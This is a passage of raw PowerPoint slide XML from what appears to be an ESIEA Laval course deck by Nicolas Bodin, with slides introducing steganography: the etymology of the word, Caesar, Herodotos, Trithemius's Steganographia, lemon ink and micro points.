                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="152288"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="object 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296626" y="2886038"/>
            <a:ext cx="86826" cy="129610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43814" h="65405">
                <a:moveTo>
                  <a:pt x="21974" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="64901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43438" y="64901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21974" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="object 155"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="object 156"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-129" dirty="0"/>
              <a:pPr marL="50335">
                <a:lnSpc>
                  <a:spcPts val="1367"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Rectangle 156"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1390363084"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618110" y="102655"/>
            <a:ext cx="967670" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Definitions</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="1640417"/>
            <a:ext cx="8418352" cy="2690349"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4248150" h="1357630">
                <a:moveTo>
                  <a:pt x="0" y="1357340"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="1357340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1357340"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="2347222"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="2763433"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="3179645"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="3595857"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="4012067"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549737" y="682125"/>
            <a:ext cx="8040848" cy="3487686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3963">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="25168">
              <a:tabLst>
                <a:tab pos="8014619" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Brief</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>History	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="573821">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2774727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stego</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="386" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>secret	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>graphein </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="386" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="218" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>writing</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="573821">
              <a:spcBef>
                <a:spcPts val="654"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="-133" baseline="27777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>st  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>appear  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of cryto </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Caesar  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(50 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>years  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BC)</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="573821" marR="1735305">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="-133" baseline="27777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>st </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>appear </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stegano </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Herodotos </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(450 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>years </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BC)  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1499 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Steganographia </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Johannes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trithemius)  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lemon  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ink, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>micro </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>point, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hiden  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>messages  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
